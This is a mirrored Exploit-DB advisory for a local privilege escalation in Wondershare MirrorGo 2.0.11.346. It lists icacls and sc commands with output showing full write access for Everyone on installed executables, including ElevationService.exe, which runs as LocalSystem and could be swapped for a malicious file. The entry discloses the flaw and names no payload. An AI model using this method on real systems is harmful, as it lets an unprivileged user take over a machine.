Wondershare MirrorGo 2.0.11.346 – Insecure File Permissions

• Exploit Database
• 12 阅读

• 作者： Luis Martínez
  日期： 2022-02-24
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/50787/

• # Exploit Title: Wondershare MirrorGo 2.0.11.346 - Insecure File Permissions
  # Discovery by: Luis Martinez
  # Discovery Date: 2022-02-23
  # Vendor Homepage: https://www.wondershare.com/
  # Software Link : https://download.wondershare.com/mirror_go_full8050.exe
  # Tested Version: 2.0.11.346
  # Vulnerability Type: Local Privilege Escalation
  # Tested on OS: Windows 10 Pro x64 es
  
  # Step to discover Privilege Escalation: 
  
  # Insecure folders permissions issue:
  
  C:\>icacls "C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\*" | findstr /i "everyone" | findstr /i ".exe"
  
  
  C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\adb.exe Everyone:(I)(F)
  C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\BsSndRpt.exe Everyone:(I)(F)
  C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\DriverInstall32.exe Everyone:(I)(F)
  C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\DriverInstall64.exe Everyone:(I)(F)
  C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\ElevationService.exe Everyone:(I)(F)
  C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\MirrorGo.exe Everyone:(I)(F)
  C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\ProcessKiller.exe Everyone:(I)(F)
  C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\ProcessKiller.exe.config Everyone:(I)(F)
  C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\unins000.exe Everyone:(I)(F)
  
  # Service info:
  
  C:\>sc qc ElevationService
  [SC] QueryServiceConfig SUCCESS
  
  SERVICE_NAME: ElevationService
  TYPE : 10WIN32_OWN_PROCESS
  START_TYPE : 2 AUTO_START
  ERROR_CONTROL: 1 NORMAL
  BINARY_PATH_NAME : C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\ElevationService.exe
  LOAD_ORDER_GROUP :
  TAG: 0
  DISPLAY_NAME : Wondershare Driver Install Service help
  DEPENDENCIES :
  SERVICE_START_NAME : LocalSystem
  
  #Exploit:
  
  A vulnerability was found in Wondershare MirrorGo 2.0.11.346. The Wondershare MirrorGo executable
  "ElevationService.exe" has incorrect permissions, allowing a local unprivileged user to replace it
  with a malicious file that will be executed with "LocalSystem" privileges.